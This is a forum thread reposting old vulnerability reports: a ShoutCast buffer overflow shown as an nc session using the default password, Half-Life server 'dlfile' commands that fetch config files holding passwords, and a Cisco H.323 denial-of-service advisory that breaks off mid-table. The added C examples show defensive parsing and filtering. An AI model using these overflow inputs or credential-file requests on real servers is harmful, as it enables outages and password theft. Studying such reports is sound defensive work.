# Software > Security > Service Level

## Mick Flemm

Topics about the various servers (daemons) that we run or may run will be posted here...

----------


## Mick Flemm

*Shoutcast...*

Information :
°°°°°°°°°°°°
Language : Microsoft Visual C++ v5.0/v6.0 (MFC)
Bugged Version : ShoutCast server 1.9.2/win32 (and less ?)
Patched version : none
Website : http://www.shoutcast.com
Problems : DoS if we know the password from the server

Objects :
°°°°°°°
- sc_serv.exe
vulnerable variable: icy-name(Server Desc) and icy-url(Stream URL)

Exploits :
°°°°°°°°
```
>nc target 8001
changeme
icy-name:AAA...[Ax275]BBBB[rewrite EAX]
icy-genre :: oS radio
icy-url:AAA...[Ax288]BBBB[rewrite EAX]
icy-pub:1
icy-irc:N/A
icy-icq:N/A
icy-aim:N/A
icy-br:160

...
stream audio data
...
```

P.S. Default password "changeme" !!!

Patch/More Details :
°°°°°°°°°°°°°°°°°°
Waiting for the patch at http://www.shoutcast.com ...
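Added example (not code from the post above or from the ShoutCast server): the post reports that an over-long icy-name or icy-url value sent to the source port overruns a fixed-size buffer in sc_serv.exe. The parser below is the defensive form of that step: the value length is checked against the destination buffer before anything is copied, and a configured source password equal to the shipped default "changeme" is refused at startup. ICY_VALUE_MAX, the function names and the constructed inputs are assumptions for the demo, not the server's real values.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example: not from the post or from the ShoutCast source.
 * ICY_VALUE_MAX is an assumed buffer size, not sc_serv.exe's real one. */
#define ICY_VALUE_MAX 255
#define ICY_DEFAULT_PASSWORD "changeme"

struct icy_header {
    char name[ICY_VALUE_MAX + 1];   /* icy-name (server description) */
    char url[ICY_VALUE_MAX + 1];    /* icy-url  (stream URL)         */
};

/* Parse one "key:value" line into the matching field of *hdr.
 * Returns 0 on success, -1 for a line this parser does not handle,
 * -2 when the value would not fit (the check the vulnerable build lacked). */
int icy_parse_line(const char *line, struct icy_header *hdr)
{
    const char *colon = strchr(line, ':');
    if (colon == NULL)
        return -1;

    size_t keylen = (size_t)(colon - line);
    const char *value = colon + 1;
    size_t vlen = strlen(value);

    /* Drop the CR/LF a raw socket read leaves at the end of the line. */
    while (vlen > 0 && (value[vlen - 1] == '\r' || value[vlen - 1] == '\n'))
        vlen--;

    char *dst;
    if (keylen == 8 && memcmp(line, "icy-name", 8) == 0)
        dst = hdr->name;
    else if (keylen == 7 && memcmp(line, "icy-url", 7) == 0)
        dst = hdr->url;
    else
        return -1;

    /* Refuse before copying; never copy-then-hope, never truncate silently. */
    if (vlen > ICY_VALUE_MAX)
        return -2;

    memcpy(dst, value, vlen);
    dst[vlen] = '\0';
    return 0;
}

/* Build a constructed icy-name line whose value is `len` 'A' bytes and parse
 * it. Mirrors the post's long-value test without any memory being overrun. */
int icy_parse_name_of_length(size_t len, struct icy_header *hdr)
{
    char line[9 + 512 + 1];
    if (len > 512)
        return -3;                   /* outside what this demo constructs */
    memcpy(line, "icy-name:", 9);
    memset(line + 9, 'A', len);
    line[9 + len] = '\0';
    return icy_parse_line(line, hdr);
}

/* Startup check: a server still using the documented default password lets
 * anyone reach the source-side parser. Returns 1 if it must be changed. */
int icy_password_is_default(const char *password)
{
    return strcmp(password, ICY_DEFAULT_PASSWORD) == 0;
}

int main(void)
{
    struct icy_header hdr;
    memset(&hdr, 0, sizeof hdr);

    printf("icy-name, 10-byte value:  %d\n", icy_parse_line("icy-name:Test Radio\r\n", &hdr));
    printf("icy-name, 300-byte value: %d\n", icy_parse_name_of_length(300, &hdr));
    printf("default password in use:  %d\n", icy_password_is_default("changeme"));
    return 0;
}
```

The parser returns an error rather than truncating, so a caller can close the source connection and log the peer; a silently truncated description would hide the probe from the operator.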

----------


## Mick Flemm

*Half-Life / Counter Strike Server*

Vendor: Valve software 
Software: hlds, all versions (including steam). 
Problem: Information leak, DoS 
Author: SYZo[SND] 

Problem: 
in server configuration, if allowdownload = 1, it's possible to download 
any file from directory of the current game (cstrike was tested) or from 
'valve' directory from server. Allowdownload is required to allow 
clients to retrieve new maps from server. 

Impact: 
It's possible to download configuration files (like server.cfg, 
configuration files for different mods, etc) with sensitive information, 
including passwords. Additionally, downloading large file (for example 
map) causes server to crash. 

"Exploit": 


```
cmd dlfile server.cfg 
cmd dlfile addons/amx/users.ini 
cmd dlfile addons/amx/mysql.cfg 
cmd dlfile maps/de_torn.bsp
```

Workaround: 
*disable downloads.*
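Added example (not code from the post above or from Valve's hlds): the post shows `cmd dlfile <path>` returning any file under the game directory once downloads are enabled, and a large file request bringing the server down. Besides the post's own workaround (disable downloads), the usual server-side fix is a request filter like this one: only files clients genuinely need, only from content directories, only below a size cap. The directory list, the extension list, the cap and the function name are assumptions for the demo.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Added example: not from the post or from hlds. Lists and cap are assumed. */
static const char *const ALLOWED_DIRS[] = { "maps/", "sound/", "sprites/", "models/", "gfx/" };
static const char *const ALLOWED_EXTS[] = { ".bsp", ".wav", ".spr", ".mdl", ".tga", ".wad" };
#define N_ALLOWED_DIRS (sizeof ALLOWED_DIRS / sizeof ALLOWED_DIRS[0])
#define N_ALLOWED_EXTS (sizeof ALLOWED_EXTS / sizeof ALLOWED_EXTS[0])
#define MAX_DOWNLOAD_BYTES (16UL * 1024UL * 1024UL)   /* assumed cap */

static bool has_suffix(const char *s, const char *suffix)
{
    size_t n = strlen(s), m = strlen(suffix);
    return n >= m && strcmp(s + n - m, suffix) == 0;
}

/* Decide whether a client download request may be served.
 * Returns 0 to allow, or a negative reason:
 *  -1 path escapes the game directory (absolute, drive letter, "..", backslash)
 *  -2 not inside an allowed content directory
 *  -3 not an allowed content type (so *.cfg and *.ini are never served)
 *  -4 file larger than the cap */
int dlfile_check(const char *path, unsigned long size_bytes)
{
    size_t i;

    if (path[0] == '\0' || path[0] == '/' || strchr(path, '\\') != NULL ||
        strchr(path, ':') != NULL || strstr(path, "..") != NULL)
        return -1;

    for (i = 0; i < N_ALLOWED_DIRS; i++)
        if (strncmp(path, ALLOWED_DIRS[i], strlen(ALLOWED_DIRS[i])) == 0)
            break;
    if (i == N_ALLOWED_DIRS)
        return -2;

    for (i = 0; i < N_ALLOWED_EXTS; i++)
        if (has_suffix(path, ALLOWED_EXTS[i]))
            break;
    if (i == N_ALLOWED_EXTS)
        return -3;

    if (size_bytes > MAX_DOWNLOAD_BYTES)
        return -4;

    return 0;
}

int main(void)
{
    /* The four requests from the post, with constructed file sizes. */
    const char *requests[] = { "server.cfg", "addons/amx/users.ini",
                               "addons/amx/mysql.cfg", "maps/de_torn.bsp" };
    unsigned long sizes[] = { 2048UL, 512UL, 256UL, 4UL * 1024UL * 1024UL };
    for (size_t i = 0; i < 4; i++)
        printf("dlfile %-22s -> %d\n", requests[i], dlfile_check(requests[i], sizes[i]));
    return 0;
}
```

The ".." test is deliberately blunt: it also rejects a legitimate name such as `de_torn..bsp`, which is the safer failure for a file server. The size cap addresses the second half of the post (a large download crashing the server); the actual limit should be set from the largest map the server ships.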

----------


## Mick Flemm

*Cisco ATA & Stuff*

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Cisco Security Advisory: Vulnerabilities in H.323 Message Processing

Document ID: 47843

Revision 1.0 - INTERIM

For Public Release 2004 January 13 UTC 1200

- --------------------------------------------------------------------------

Contents
========

Summary
Affected Products
Unaffected Products
Details
Impact
Software Versions and Fixes
Obtaining Fixed Software
Workarounds
Exploitation and Public Announcements
Status of This Notice: INTERIM
Distribution
Revision History
Cisco Security Procedures

- --------------------------------------------------------------------------

Summary
=======

Multiple Cisco products contain vulnerabilities in the processing of H.323
messages, which are typically used in Voice over Internet Protocol (VoIP)
or multimedia applications. A test suite has been developed by the
University of Oulu to target this protocol and identify vulnerabilities.

Support for the H.323 protocol was introduced in Cisco IOS® Software
Release 11.3T. Release 11.3T, and all later Cisco IOS releases are
affected if configured for various types of voice/multimedia application
support. Vulnerable devices include those configured as an H.323 network
element as well as those configured for IOS Network Address Translation
(NAT) and those configured for IOS Firewall (also known as Context-Based
Access Control [CBAC]).

Other Cisco voice products that do not run Cisco IOS may also be affected.

These vulnerabilities can be exploited repeatedly to produce a denial of
service (DoS).

This advisory is available at 
http://www.cisco.com/warp/public/707/ci ... h323.shtml.

Affected Products
=================

All Cisco products that run Cisco IOS software and support H.323 packet
processing are affected. This may include devices configured for Session
Initiation Protocol (SIP) or Media Gateway Control Protocol (MGCP), since
support for these protocols can enable support for H.323. Cisco AS5xxx
series platforms are vulnerable regardless of their configuration because
of a bug that enables H.323 but does not allow the protocol to be turned
off.

Other affected products that do not run Cisco IOS software include:

* Cisco CallManager versions 3.0 through 3.3

* Cisco Conference Connection (CCC)

* Cisco Internet Service Node (ISN)

* Cisco BTS 10200 Softswitch

* Cisco 7905 IP Phone H.323 Software Version 1.00

* Cisco ATA 18x series products running H.323/SIP loads with versions
earlier than 2.16.1

Note: Cisco ATA 18x series products are only vulnerable when configured
for H.323. They are not vulnerable when configured for SIP.

To determine the software running on a Cisco product, log in to the device
and issue the show version command to display the system banner. Cisco IOS
Software will identify itself as "Internetwork Operating System Software"
or simply "IOS." On the next line of output, the image name will be
displayed between parentheses, followed by "Version" and the IOS release
name. Other Cisco devices will not have the show version command or will
give different output.

The following example identifies a Cisco product running Cisco IOS
Software Release 12.0(3) with an installed image name of C2500-IS-L. The
release train label is 12.0.

```
Cisco Internetwork Operating System Software IOS (TM)
2500 Software (C2500-IS-L), Version 12.0(3), RELEASE SOFTWARE
```

The following example shows a product running Cisco IOS Software Release
12.0(2a)T1 with an image name of C2600-JS-MZ.

```
Cisco Internetwork Operating System Software IOS (tm)
C2600 Software (C2600-JS-MZ), Version 12.0(2a)T1, RELEASE SOFTWARE (fc1)
```

Additional information about Cisco IOS version naming is available at 
http://www.cisco.com/warp/public/620/1.html.

If you are running Cisco IOS versions 10.x, 11.1, 11.2 or earlier, you are
not affected.


Cisco IOS Processing of H.323 Traffic

There are three areas where IOS can be vulnerable to malformed H.323
packets. Please read the following sections to determine if your router is
affected.

Note: If you choose to block H.323 traffic using an access list to prevent
H.323 traffic from entering the router, then you are protected and need
not bother with the details below. Please see the Workarounds section for
more details on how to do this. Cisco recommends that customers upgrade to
an appropriate IOS image at their earliest convenience.

To determine if your Cisco IOS device is processing H.323 traffic and is
possibly vulnerable, it is necessary to understand the three different
ways that Cisco IOS software processes H.323 traffic.

1. H.323 Endpoints

This includes H.323 Gateway, H.323 Gatekeeper, H.323 Gatekeeper with Proxy
and ALL of the AS5xxx platforms.

- From the enable prompt, run the show process cpu command and look for a
process called CCH323_CT. In later versions of Cisco IOS software, you can
execute the show process cpu | include CCH323_CT .

```
Router# show process cpu | include CCH323_CT
112 Mwe 60F3E5E0 295112 239401 123220072/24000 0 CCH323_CT
```

Note: Not all access server images support H.323. Only images with a
"PLUS" feature set (such as IP PLUS, ENTERPRISE PLUS) support voice and
will have the CCH323_CT process running.

* If you see the a process called CCH323_CT, your router is affected.
Please consult the IOS table to determine which version is appropriate
for your device. If you cannot immediately upgrade, the following
workarounds may work for you

+ If you are not using H.323 within your network, an inbound access
list to block TCP port 1720 will protect your router, but it is
recommended that you upgrade as soon as is feasible.

+ If you are using H.323, then you can configure an access list to
restrict TCP port 1720 traffic to known, trusted IP addresses.
Again, upgrading as soon as is feasible is recommended.

* If you do NOT see the CCH323_CT process, you may still be vulnerable.
Some configurations of H.323 Gatekeeper are vulnerable. Affected
configurations are those gatekeepers configured for H.323 Proxy. To
check to see if you are configured as a gatekeeper, check your
configuration for the line "proxy h323" in the global configuration.
If you have "proxy h323" configured, then you are vulnerable.

+ If you are not using GK proxy functionality, you can disable proxy
functionality by doing the following configuration.

Note: This will drop all calls being managed by the gatekeeper.
Perform this only when you can safely stop gatekeeper
functionality.

```
Router(config)#no proxy h323
Router(config)#gatekeeper
Router(config-gk)#shutdown
Router(config-gk)#no shutdown
```

+ If you are using H.323 proxy, your options are to either configure
an access list to restrict TCP port 1720 traffic to known, trusted
IP addresses, or to upgrade your IOS version.

2. IOS Firewall (Context-Based Access Control)

If your IOS device is configured to use IOS Firewall (IOS FW, or
Context-Based Access Control [CBAC]), check to see if IOS FW is running on
the device by issuing the show ip inspect all command. Look for the
following lines indicating that IOS FW is applied to an interface. In this
case, inspection rule "<NAME>" is applied inbound to interface
FastEthernet0/0.

```
Interface Configuration
Interface FastEthernet0/0
Inbound inspection rule is <NAME>
tcp alert is on audit-trail is off timeout 3600
h323 alert is on audit-trail is off timeout 3600
Outgoing inspection rule is not set
```

* To turn off inbound IOS FW (CBAC) on interface FastEthernet0/0, enter
the following commands in interface configuration mode.

```
Router#config t
Router(config)#Interface FastEthernet 0/0
Router(config-if)#no ip inspect <NAME> in
```

* If outbound IOS FW (CBAC) is configured on FastEthernet0/0, enter the
following commands in interface configuration mode.

```
Router#config t
Router(config)#Interface FastEthernet 0/0
Router(config-if)#no ip inspect <NAME> out
```

* To turn off the IOS FW (CBAC) processing of H.323 messages only while
leaving other IOS FW behavior unaffected, enter the following command
in global configuration mode.

```
Router(config)#no ip inspect name <NAME> h323
```

Cisco recommends that you upgrade your IOS as soon as possible.

3. IOS Network Address Translation (NAT)

If you have configured NAT rules and have NAT activated on any interface,
check to see if NAT is configured and activated on the device by issuing
the show ip nat statistics command.

```
Router#show ip nat statistics

Total active translations: 3 (3 static, 0 dynamic; 0 extended
Outside interfaces
Inside interfaces
Hits: 0 Misses: 0
Expired translations: 0
Dynamic mappings:
```

* If there is no output or the output doesn't list any inside or outside
interfaces (as in the example above), then the IOS device is not doing
NAT and you are not vulnerable because of NAT.

* If the output does list any inside or outside interfaces, then you may
be vulnerable because of NAT. An example is shown below.

```
Total active translations: 3 (3 static, 0 dynamic; 0 extended
Outside interfaces:
Serial3/0
Inside interfaces:
Serial1/0
Hits: 0 Misses: 0
Expired translations: 0
Dynamic mappings:
```

* You are not vulnerable because of NAT if your configuration only
contains Port Address Translation (PAT) statements and your PAT
statements do not explicitly specify TCP port 1720 in your PAT
translations.

+ To see if you are doing only PAT, check to see if your IOS NAT
configuration contains any of the following NAT rules without the 
overload, route-map, or extendable keywords.

```
ip nat outside source ...
ip nat inside destination ...
ip nat inside source ...
```

If you see any of the above lines without the overload, route-map,
or extendable keywords, then you are vulnerable.

+ To see if you are doing a static PAT for H.323 (TCP port 1720),
look for any lines with the following pattern.

```
ip nat (inside|outside) source static tcp
ip-addr (port|1720) ip-addr (1720|port)
```

The following examples would be vulnerable.

```
ip nat inside source static tcp 10.1.0.1 1720 10.2.0.1 5834
ip nat outside source static tcp 10.15.12.1 6884 10.6.7.1 1720
ip nat inside source static tcp 10.1.0.17 1720 10.33.14.1 1720
```

The following examples would not be vulnerable.

```
ip nat inside source static tcp 10.1.0.17 53 10.33.14.1 53
ip nat outside source static udp 10.1.14.75 1720 10.131.1.1 6888
```

If any of your configuration lines are vulnerable, please consult
the Workarounds section.

To determine if a particular Cisco IOS release is vulnerable, consult the
list below in the Software Versions and Fixes section to determine if the
product is running an affected version of software.

Unaffected Products
===================

The following list of Cisco products is provided specifically to list
those products that customers may also be concerned about in regards to
these vulnerabilities. The products below are not affected either because
they are not vulnerable or because they do not support H.323 processing.
Any other Cisco products that have not been identified as vulnerable or
have been omitted from the list below should be considered as not
vulnerable, as no other Cisco products are known to be affected by these
vulnerabilities.

* Cisco IP Phone models 7960, 7940, 7912, 7910, 7902, 30VIP, and 12SP+

* Cisco uOne (All Versions)

* VG248 Analog Phone Gateway

* Cisco Unity Server

* Catalyst 6000 WS-X6608 Voice Services Module and WS-X6624 FXS Analog
Station Interface Module

* PGW2200, SC2200, VSC3000 and H.323 Signalling Interface (HSI)

* Cisco IP/VC 3500 Series

* IP/TV series

* Catalyst 19xx, 28xx, 290x, 292x, 2948g, 3000, 3200, 3900, 4000, 4912g,
and 5000 series switches

* Catalyst 2900XL, 2900XL-LRE, 2940, 2950, 2950-LRE, 2955, 2970, 3500XL,
3550, and 3750 series switches

* Cache Engine series

* Content Engine series

* SN5400 series storage routers

* VPN 3000 and VPN 5000 series VPN concentrators

* Voice Interworking Service Module (VISM)

* VCO/4K

* Cisco Secure Intrusion Detection System (NetRanger) appliance and IDS
Module

* BR340, WGB340, AP340, AP350, and BR350 Cisco/Aironet wireless products

* Cisco Aironet 1100 series, 1200 series, and 1400 series wireless
products

* Cisco PIX Firewall

* Cisco Catalyst 6500 Series Firewall Services Module

* Cisco 6xx series DSL modems running CBOS

* Cisco 7xx series routers

* Cisco 12000 series routers

* Cisco 10000 series routers

* 61xx and 62xx series DSLAMs

* Cisco CSS11xxx series (including SSL Accelerator)

* LocalDirector

* BPX, IGX, MGX WAN switches, and the Service Expansion Shelf

* Cisco Intelligent Contact Management (ICM)

* Cisco ONS 15xxx platforms

Details
=======

H.323 is the International Telecommunications Union (ITU) standard for
real-time multimedia communications and conferencing over packet-based
(IP) networks. A subset of the H.323 standard is H.225.0, a standard used
for call signalling protocols and media stream packetization over IP
networks.

The H.225.0 standard defines message formats for call setup, call control,
and communications using Abstract Syntax Notation One (ASN.1). ITU
Standard Q.931, which was developed for call signalling purposes in ISDN
networks, is also used as the standard for the call setup messages within
H.225.0.

The University of Oulu Secure Programming Group (OUSPG) has created a test
suite for H.323, more specifically the H.225.0 and Q.931 messages, to help
support proactive discovery and resolution of vulnerabilities in the
processing of H.323 messages. The test suite is generally used to analyze
a protocol and produce messages that probe various design limits within an
implementation of a protocol. Test packets containing overly long or
exceptional elements in various fields of the H.323 Protocol Data Units
(PDUs) can be programmatically generated and then transmitted to a network
device under test. The PROTOS test suite for H.323, as distributed,
contains approximately 4500 individual test cases.

The vulnerabilities discovered in the affected products can be easily and
repeatedly demonstrated with the use of the OUSPG PROTOS Test Suite for
H.323. The largest group of vulnerabilities described in this advisory
result from insufficient checking of H.225.0 messages as they are received
and processed by an affected system. Malformed H.225.0 messages received
by affected systems can cause various parsing and processing functions to
fail, which may result in a system crash and reload (or reboot) in most
circumstances.

Typically, H.323 network elements implement call signalling over both UDP
and TCP transports on port 1720. The H.323 test suite from OUSPG only
tests the TCP implementation on port 1720 by default.


Cisco IOS

| Cisco IOS Software Release | Description of Vulnerability |
|---|---|
| 11.1, 11.2, 11.3, 12.3 | Not vulnerable |
| 11.3T, 12.0, 12.0S, 12.0T, 12.1, 12.1T, 12.1E, 12.2, 12.2S, 12.2T | Vulnerabilities exist in the processing of H.323 Network Element traffic. This includes H.323 Gateway, H.323 Gatekeeper, and H.323 Gatekeeper with Proxy. |
| 12.1, 12.1E, 12.2, 12.2T, 12.2S, 12.3T | Vulnerabilities exist in the processing of H.323 IOS NAT traffic. |
| 12.0, 12.1, 12.1E, 12.2, 12.2T, 12.2S | Vulnerabilities exist in the processing of H.323 IOS Firewall (CBAC) traffic. |

The vulnerabilities in Cisco IOS for devices acting as H.323 dial-peer
endpoints are documented in the following Bug IDs: CSCdt09262 ( registered
customers only) , CSCdt54401 ( registered customers only) , CSCdw14262 ( 
registered customers only) , CSCdx76632 ( registered customers only) , 
CSCdx77253 ( registered customers only) , CSCea19885 ( registered
customers only) , CSCea32240 ( registered customers only) , CSCea36231 ( 
registered customers only) , CSCea33065 ( registered customers only) , 
CSCea42826 ( registered customers only) , CSCea42527 ( registered
customers only) , CSCea44227 ( registered customers only) , CSCea44309 ( 
registered customers only) , CSCea46342 ( registered customers only) , and
CSCec79541 ( registered customers only) .

For those Cisco IOS devices acting as a H.323 gatekeeper with proxy
configured, the vulnerabilities are documented in the following Bug IDs: 
CSCea51076 ( registered customers only) , CSCea51030 ( registered
customers only) , and CSCea54851 ( registered customers only) .

Cisco IOS devices performing NAT translations on H.323 v3/4 traffic may be
vulnerable. Releases based off 12.2T must be running a version of IOS that
is based off 12.2(11)T or later and must have the hidden command ip nat
service h323all enabled. The default condition for this command is
disabled. In releases based off 12.1 and 12.1E, the device is only
vulnerable to packets sent from the outside interface to the inside
interface. This means that networks are only vulnerable if they have
static translations configured and accept connections to port 1720. A
dynamic translation can occur on port 1720, but the attack traffic would
then have to return from the destination address of the original flow and
must traverse the router while the translation is still active. Methods to
reduce exposure for dynamic translations are listed in the Workarounds
section.

The vulnerabilities in Cisco IOS for devices doing NAT on H.323 packets
starting in IOS 12.1 are documented in the following Bug IDs: CSCdr48143 (
registered customers only) , CSCdx40184 ( registered customers only) , 
CSCea27536 ( registered customers only) , CSCec76694 ( registered
customers only) , and CSCed28873 ( registered customers only) .

The vulnerabilities in Cisco IOS for devices running IOS Firewall Feature
Set doing deep packet inspection of H.323 packets in IOS starting in 12.1
are documented in the following Bug IDs: CSCec76776 ( registered customers
only) and CSCec87533 ( registered customers only) .


Cisco CallManager

The vulnerabilities in Cisco CallManager are documented in Bug IDs 
CSCdx82831 ( registered customers only) , CSCea46545 ( registered
customers only) , and CSCea55518 ( registered customers only) .

In order for a Cisco CallManager running 3.1 or 3.2 to be vulnerable, the
IP address of the originating device must be configured as a H.323
gateway, H.323 client, or intercluster trunk on the CallManager, or "Allow
Anonymous Calls" must be enabled in the gatekeeper section of the
CallManager configuration. If a CallManager receives H.323 messages from a
device that is not configured as an H.225.0 device, the TCP session will
be closed before the H.225.0 message is processed. If "Allow Anonymous
Calls" is enabled in the gatekeeper configuration, the CallManager server
is vulnerable since it will try to parse the H.225.0 message from any
originating source.

In CallManager 3.3, the server is vulnerable and will try to parse H.225.0
messages received from any originating source, but the CallManager may be
listening on a port other than TCP 1720. Since the port number for
anonymous calls is something other than TCP 1720, a potential attacker
would need to determine which random port the CallManager H.323 gateway is
listening on in order to carry out a successful attack.


Cisco Conference Connection

All versions of Cisco Conference Connection (CCC) are affected. There are
currently no software fixes planned for Cisco Conference Connection (CCC).
Customers running CCC should implement a workaround to limit H.323 traffic
from trusted hosts only. A workaround for this may be found in the 
Workarounds section.


Cisco Internet Service Node

All versions of Internet Service Node (ISN) are affected. There are
currently no software fixes planned for Cisco Internet Service Node (ISN).
Customers running ISN should implement a workaround to limit H.323 traffic
from trusted hosts only. A workaround for this may be found in the 
Workarounds section.


Cisco 7905 Series IP Phone

The vulnerabilities in the Cisco 7905 IP Phone are documented in Bug ID 
CSCec77152 ( registered customers only) .


Cisco ATA18x Series Analog Telephony Devices

The vulnerabilities in the Cisco ATA18x devices are documented in Bug IDs 
CSCea46231 ( registered customers only) and CSCea48726 ( registered
customers only) .


Cisco BTS 10200 Softswitch

The vulnerabilities in the Cisco BTS 10200 Softswitch are documented in
BugID CSCea48755 ( registered customers only) .

Impact
======

The vulnerabilities may be exploited to produce a denial of service (DoS)
attack. When the vulnerabilities are exploited, they may cause an affected
product to crash and reload. In the case of the Cisco CallManager, ISN,
and CCC, exploitation will result in a crash or a hang indicated by
processor utilization of 100%. When the CPU utilization is at 100% on
server-based platforms, call processing services degrade severely, calls
may drop, and no new calls can be established. A reboot of the device is
required to return it to normal service.

Software Versions and Fixes
===========================

Cisco IOS Software

Each row of the table describes a release train and the platforms or
products for which it is intended. If a given release train is vulnerable,
then the earliest possible releases that contain the fix and the
anticipated date of availability for each are listed in the Rebuild,
Interim, and Maintenance columns. In some cases, no rebuild of a
particular release is planned; this is marked with the label "Not
scheduled." A device running any release in the given train that is
earlier than the release in a specific column (less than the earliest
fixed release) is known to be vulnerable, and it should be upgraded at
least to the indicated release or a later version (greater than the
earliest fixed release label).

When selecting a release, keep in mind the following definitions.

* Maintenance

Most heavily tested and highly recommended release of any label in a
given row of the table.

* Rebuild

Constructed from the previous maintenance or major release in the same
train, it contains the fix for a specific vulnerability. Although it
receives less testing, it contains only the minimal changes necessary
to effect the repair. Cisco has made available several rebuilds of
mainline trains to address this vulnerability, but strongly recommends
running only the latest maintenance release on mainline trains.

* Interim

Built at regular intervals between maintenance releases and receives
less testing. Interims should be selected only if there is no other
suitable release that addresses the vulnerability, and interim images
should be upgraded to the next available maintenance release as soon
as possible. Interim releases are not available through manufacturing,
and usually they are not available for customer download from CCO
without prior arrangement with the Cisco Technical Assistance Center
(TAC).

In all cases, customers should exercise caution to be certain the devices
to be upgraded contain sufficient memory and that current hardware and
software configurations will continue to be supported properly by the new
release. If the information is not clear, contact the Cisco TAC for
assistance, as shown in the section following this table.

Note: For the purposes of the table below, the identifier "Element"
covers the fixes for IOS devices running as H.323 endpoints and as
gatekeepers with proxy configured.

```
+-----------------------------------------------------------------+
| Train | Vulnerable | Availability of Fixed Releases |
| | Configuration | |
|------------------------+----------------------------------------|
| 10.x-based Releases | Not Vulnerable |
|------------------------+----------------------------------------|
| 11.x-based Releases | Rebuild | Interim | Maintenance |
|------------------------+----------------------------------------|
| 11.0 | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 11.1 | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 11.1AA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 11.1CA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 11.1CC | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 11.2 | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 11.2P | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 11.2SA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 11.3 | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | | Introduced H.323 feature in 11.3(3)T |
| | | |
| | | Vulnerable |
| 11.3T | | |
| | | No Software Fixes Scheduled |
| | | |
| | | Migrate to 12.0 |
|------------------------+----------------------------------------|
| 12.0-based Releases | Rebuild | Interim | Maintenance |
|------------------------+-------------+-----------+--------------|
| | | | | 12.0(2 ::  |
| | Element | | | |
| | | | | available |
| | | | | 15-Jan-2004 |
| |---------------+-------------+-----------+--------------|
| 12.0 | | | | 12.0(2 ::  |
| | NAT | | | |
| | | | | available |
| | | | | 15-Jan-2004 |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0D | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0DA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0DC | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | | 2600/3600 | | |
| | | Platforms | | |
| | | ONLY | | 2600/3600 |
| | | | | Platforms |
| | Element | 12.0(25)S1, | | ONLY |
| | | | | |
| 12.0S | | 12.0(24)S2, | | 12.0(26)S |
| | | | | |
| | | 12.0(23)S3 | | |
| |---------------+----------------------------------------|
| | NAT | Not Vulnerable |
| |---------------+----------------------------------------|
| | IPFW | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0SC | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0SL | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0SP | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0ST | | No fixes planned, only 2600/3600 |
| | | platforms vulnerable |
|--------+---------------+----------------------------------------|
| 12.0SX | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0SY | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0SZ | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0T | | Vulnerable. No fixes planned. |
|--------+---------------+----------------------------------------|
| 12.0W5 | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0WC | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0WT | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.0XC | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XD | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XG | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XH | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XI | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XJ | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XK | | Vulnerable. Migrate to 12.2(19) |
|--------+---------------+----------------------------------------|
| 12.0XL | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XN | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XQ | | Vulnerable. Migrate to 12.1(21) |
|--------+---------------+----------------------------------------|
| 12.0XR | | Vulnerable. Migrate to 12.2(19) |
|--------+---------------+----------------------------------------|
| | | Vulnerable. |
| 12.0XT | | |
| | | No migration path |
|------------------------+----------------------------------------|
| 12.1-based Releases | Rebuild | Interim | Maintenance |
|------------------------+-------------+-----------+--------------|
| | Element | 12.1(21a) | | 12.1(22) |
| |---------------+-------------+-----------+--------------|
| 12.1 | NAT | 12.1(21a) | | 12.1(22) |
| |---------------+-------------+-----------+--------------|
| | IPFW | 12.1(21a) | | 12.1(22) |
|--------+---------------+----------------------------------------|
| 12.1AA | | Vulnerable. Migrate to 12.2(19) |
|--------+---------------+----------------------------------------|
| 12.1AX | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1AY | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1DA | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1DB | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| 12.1DC | | Not Vulnerable |
|--------+---------------+----------------------------------------|
| | Element | 12.1(20)E1 | | |
| |---------------+-------------+-----------+--------------|
| | | 12.1(8b) | | |
| | | E18, | | |
| | | | | |
| | | 12.1(11b) | | |
| | | E14, | | |
| | | | | |
| | | 12.1(13) | 12.1 | |
| | NAT | E13, | (21.3)E | |
| | | | | |
| | | 12.1(14) | | |
| | | E10, | | |
| | | | | |
| | | 12.1(19)E6, | | |
| 12.1E | | | | |
| | | 12.1(20)E2 | | |
| |---------------+-------------+-----------+--------------|
| | | 12.1(8b) | | |
| | | E16, | | |
| | | | | |
| | | 12.1(11b) | | |
